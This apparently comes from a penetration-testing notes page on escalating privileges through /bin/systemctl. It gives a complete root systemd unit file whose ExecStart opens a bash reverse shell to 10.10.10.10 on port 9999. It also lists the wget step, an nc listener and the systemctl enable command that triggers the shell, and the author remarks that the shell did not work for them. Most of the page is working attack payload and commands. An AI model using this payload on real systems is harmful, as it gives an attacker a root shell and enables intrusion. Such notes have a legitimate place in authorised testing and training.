/bin/systemctl

Tried this one in practice but could not get a revshell

#Craft a payload and serve in /tmp (kali:10.10.10.10) , call it root.service 

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
WantedBy=multi-user.target

#wget the file into any writable directory on target

#Setup a listener on kali, port quad9

nc -nvlp 9999

#Trigger reverse shell with :

/bin/systemctl enable /tmp/root.service
Previoussudo_injectNextless

Last updated